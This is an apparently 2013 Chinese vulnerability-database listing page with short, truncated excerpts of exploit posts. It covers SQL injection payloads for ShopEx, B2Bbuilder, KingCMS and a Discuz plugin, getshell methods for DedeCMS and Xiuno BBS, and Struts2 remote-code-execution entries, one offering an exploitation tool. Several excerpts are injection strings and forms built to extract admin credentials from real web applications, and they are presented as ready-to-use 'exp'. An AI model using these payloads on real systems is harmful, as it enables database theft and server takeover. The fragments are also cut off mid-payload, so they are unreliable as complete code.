Vulndb

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,Exploit、Shellcode、PoC

Dede后台getshell【过20130715】

测试版本为:V5.7 20130715 测试步骤: 后台——SQL命令运器——执行命令 PgSQL INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES (2000, 0...

2013-10-28 Vulndb

08cms SQL 注入漏洞利用

来源:www.08sec.com 汽车的: /include/paygate/alipay/pays.php PHP /*  *类名:alipay_notify  *功能:付款过程中服务器通知类  *详细:该页面是通知返回核心处理文件,不需要修改  *版本:3.1  *修改日期:2010-10-29  '说...

2013-09-05 Vulndb

shopex 4.8.5 api.php注入漏洞0day exp

PHP <form method='post' action='http://www.site.com/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,...

2013-08-05 Vulndb
Struts2再爆远程代码执行漏洞(S2-016)

Struts2再爆远程代码执行漏洞(S2-016)

Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 描述 影响版本 Struts 2.0.0 - Struts 2.3.15 报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc. CVE编号 CVE-2013-2251 漏...

2013-07-20 Vulndb

B2Bbuilder注入漏洞+Exp+默认管理员帐号

测试的程序版本为:B2Bbuilder_v6.6 http://www.site.com/?m=offer&s=offer_list&id=1004+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.us...

2013-07-19 Vulndb

dedecms利用xss+csrf getshell

dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss,利用js代码: JavaScript var request = false; ...

2013-06-05 Vulndb
Struts2.3.1.4 s2-013 0day利用工具+动画

Struts2.3.1.4 s2-013 0day利用工具+动画

一共是3个struts2 的利用 网上之前的工具也只是搞2010的而已 当然重点是昨天刚出的s2-013 0day 这个是没补丁的 我不会告诉你们这洞很鸡肋 最好你自己打个环境来测一下 免得你以为工具不能用 关于2010那洞 我就不说了 2011那个也不说了 (这两成功率 还是顶高的) s2-013 实战 鸡肋 (要不然这工具也不会丢出来了 最好你自己打个环境来测一...

2013-05-25 Vulndb
KingCMS 1.0 SQL Injection漏洞

KingCMS 1.0 SQL Injection漏洞

EXP http://site/index.php/list-13 and 1=1-1.html

2013-05-01 Vulndb
xiuno bbs 后台Getshell漏洞

xiuno bbs 后台Getshell漏洞

官方介绍: Xiuno 这个名字来源于圣斗士星矢白羊座的黄金圣斗士修罗,他的攻击速度和战斗力是十二宫最强的,他是速度和力量的化身;在佛教里面,修罗为六道之一,处于人道和天道之间的一道,半人半神,性情刚烈,好战斗。我们取其寓意,希望XIUNO变得越来越强,越来越快。 在 Xiuno BBS 的第一行代码开始(一共大约有4W多行代码,历时多年积...

2013-04-24 Vulndb

Discuz交友插件漏洞附EXP

DZ交友插件漏洞jiaoyou.php?pid=1 有的注入需要登录,注入代码如下: ' or @' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from in...

2013-04-23 Vulndb